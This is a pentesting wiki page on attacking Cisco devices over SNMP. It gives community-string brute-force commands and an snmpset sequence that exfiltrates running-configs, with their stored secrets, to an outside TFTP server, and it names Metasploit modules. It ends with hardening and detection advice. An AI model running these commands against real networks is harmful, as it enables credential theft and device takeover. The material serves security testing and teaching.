# Cisco SNMP {{#include ../../banners/hacktricks-training.md}} ## Pentesting Cisco Networks **SNMP** functions over UDP with ports **161/UDP** for general messages and **162/UDP** for trap messages. This protocol relies on *community strings*, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically **read-only (RO) or read-write (RW) permissions**. A classic—yet still extremely effective—attack vector is to **brute-force community strings** in order to elevate from unauthenticated user to device administrator (RW community). A practical tool for this task is [**onesixtyone**](https://github.com/trailofbits/onesixtyone): ```bash onesixtyone -c community_strings.txt -i targets.txt ``` Other fast options are the Nmap NSE script `snmp-brute` or Hydra's SNMP module: ```bash nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24 hydra -P wordlist.txt -s 161 10.10.10.1 snmp ``` --- ### Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB) If you obtain an **RW community** you can copy the running-config/startup-config to a TFTP/FTP server *without CLI access* by abusing the CISCO-CONFIG-COPY-MIB (`1.3.6.1.4.1.9.9.96`). Two common approaches are: 1. **Nmap NSE – `snmp-ios-config`** ```bash nmap -sU -p161 --script snmp-ios-config \ --script-args creds.snmp=private 192.168.66.1 ``` The script automatically orchestrates the copy operation and prints the configuration to stdout . 2. **Manual `snmpset` sequence** ```bash # Copy running-config (4) to a TFTP server (1) – random row id 1234 snmpset -v2c -c private 192.168.66.1 \ 1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \ # protocol = tftp 1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \ # sourceFileType = runningConfig 1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \ # destFileType = networkFile 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\ 1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4 # rowStatus = createAndGo ``` Row identifiers are *one-shot*; reuse within five minutes triggers `inconsistentValue` errors. Once the file is on your TFTP server you can inspect credentials (`enable secret`, `username secret`, etc.) or even push a modified config back to the device. --- ### Metasploit goodies * **`cisco_config_tftp`** – downloads running-config/startup-config via TFTP after abusing the same MIB. * **`snmp_enum`** – collects device inventory information, VLANs, interface descriptions, ARP tables, etc. ```bash use auxiliary/scanner/snmp/snmp_enum set RHOSTS 10.10.100.10 set COMMUNITY public run ``` --- ## Recent Cisco SNMP vulnerabilities (2023 – 2025) Keeping track of vendor advisories is useful to scope *zero-day-to-n-day* opportunities inside an engagement: | Year | CVE | Affected feature | Impact | |------|-----|-----------------|--------| | 2025 | CVE-2025-20174 | SNMP subsystem | Crafted packet leads to authenticated *DoS* (reload) on IOS/IOS-XE (v1/v2c/v3). | | 2024 | CVE-2024-20373 | IPv4 ACL handling | Mis-configured **extended** ACLs silently *fail*, allowing unauthenticated SNMP polling when a valid community/user is known. | | 2025 | (no CVE yet) | SNMPv3 configuration restriction bypass | Valid v3 user can poll from addresses that should be denied. | Exploitability often still depends on possessing the community string or v3 credentials—another reason why brute-forcing them remains relevant. --- ## Hardening & Detection tips * Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVE above). * Prefer **SNMPv3** with `authPriv` (SHA-256/AES-256) over v1/v2c. ``` snmp-server group SECURE v3 priv snmp-server user monitor SECURE v3 auth sha priv aes 256 ``` * Bind SNMP to a management VRF and **restrict with *standard* numbered IPv4 ACLs** (extended named ACLs are risky – CVE-2024-20373). * Disable **RW communities**; if operationally required, limit them with ACL and views: `snmp-server community RW 99 view SysView` * Monitor for: - UDP/161 spikes or unexpected sources (SIEM rules). - `CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource` events indicating out-of-band config changes. * Enable **SNMPv3 logging** and `snmp-server packetsize 1500` to reduce certain DoS vectors. --- ## References - Cisco: *How To Copy Configurations To and From Cisco Devices Using SNMP* - Cisco Security Advisory *cisco-sa-snmp-uwBXfqww* (CVE-2024-20373) {{#include ../../banners/hacktricks-training.md}}